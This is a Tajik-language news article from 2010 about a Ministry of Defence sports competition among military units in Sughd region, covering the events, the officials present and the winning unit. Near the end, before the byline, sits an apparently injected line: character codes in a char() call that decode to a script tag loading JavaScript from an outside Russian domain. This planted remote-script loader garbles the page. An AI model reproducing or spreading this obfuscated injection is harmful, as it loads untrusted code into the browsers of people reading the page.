12.07.2010
АФСАРОН НИЗ ВАРЗИШГАРАНД
Се рӯз аскарони қисмҳои ҳарбие, ки тобеи Вазорати Мудофиаи Ҷумҳурии Тоҷикистон ҳастанд, аз рӯи чанд намуд варзиш бо ҳам қувва озмуданд. Ин қувваозмои барои дарёфти ҷоми вазири мудофиаи ҶТ доир гардид.
Мусобиқа аз санаи 5-у то санаи 7-ум гузаронида шуд ва хизматҷиёни ҳарбӣ санъату маҳорати хешро намоиш доданд. Мусобиқаи мазкур дар машқгоҳи ҳарбии вилояти Суғд воқеъ дар Чойрухдаррон гузаронида шуд. Он аз рӯи намудҳои варзиш ба монанди бисёрмуҳориба, волейбол, баскетбол, гӯштини миллӣ, ҷанги тан ба тан, варзиши сабук ва ғайра бо ҳам қувва озмуданд. Масъулин ҳадафи баргузории ин мусобиқаро дарёфти истеъдодҳои нав ва пурқувваттар кардани муносибатҳо ва робитаҳои аскарони қисмҳои низомии вилоят арзёбӣ намуданд.
Қайд кардан ҷоиз аст, ки дар мусобиқаи мазқур сардори клуби марказии варзишии Вазорати мудофиаи ҶТ подполковник Фарҳод Раҳмутуллоев, корманди комиссарияти ҳарбии вилоят Шариф Азизов ва дигар шахсони расми иштирок карданд.
Шариф Азизов мегӯяд, ки барои робитаи мустаҳкам байни ҳизматчиёни харби чунин мусобиқаҳо бояд зиёд карда шаванд.
- Ин мусобиқа сабаб гашт, ки мо истеъдодҳои нав ва варзишгарони соҳибтаҷрибаро пайдо намоем.
Дар интиҳои мусобиқа барои иштирокдорони фаъол тӯҳфаву ифтихорномаҳо супорида шуд. Ҷоми вазири мудофиаро аскарони қисми ҳарбии 08362, ки дар шаҳри Чкалови вилояти Суғд воқеъ аст, соҳиб гардиданд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)ef37022b89d3ace0ddc9693d57d6a833.js" type="text/javascript">

Саиди Сайф